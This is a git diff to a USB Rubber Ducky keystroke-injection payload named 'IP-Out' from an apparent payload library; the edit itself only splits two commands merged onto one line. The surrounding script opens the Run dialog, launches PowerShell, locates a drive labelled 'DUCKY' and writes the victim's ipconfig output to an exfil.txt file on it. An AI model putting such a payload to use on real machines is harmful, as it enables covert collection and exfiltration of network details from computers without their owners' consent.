diff --git a/payloads/library/credentials/IP-Out/payload.txt b/payloads/library/credentials/IP-Out/payload.txt index c9746ef..016761b 100644 --- a/payloads/library/credentials/IP-Out/payload.txt +++ b/payloads/library/credentials/IP-Out/payload.txt @@ -54,7 +54,8 @@ DELAY 500 GUI r DELAY 300 STRINGLN Powershell -DELAY 1000DEFINE #DRIVELABEL DUCKY +DELAY 1000 +DEFINE #DRIVELABEL DUCKY STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 } WAIT_FOR_STORAGE_ACTIVITY WAIT_FOR_STORAGE_INACTIVITY